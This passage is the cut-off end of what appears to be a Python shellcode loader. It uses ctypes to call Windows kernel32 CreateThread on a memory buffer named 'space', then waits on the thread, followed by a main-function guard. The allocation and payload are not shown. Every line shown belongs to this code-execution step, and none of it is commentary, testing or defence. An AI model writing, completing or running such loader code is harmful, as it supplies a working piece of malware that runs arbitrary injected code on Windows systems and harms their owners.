    handle = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_void_p(space),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))
    ctypes.windll.kernel32.WaitForSingleObject(handle, -1)

if __name__ == "__main__":
    main()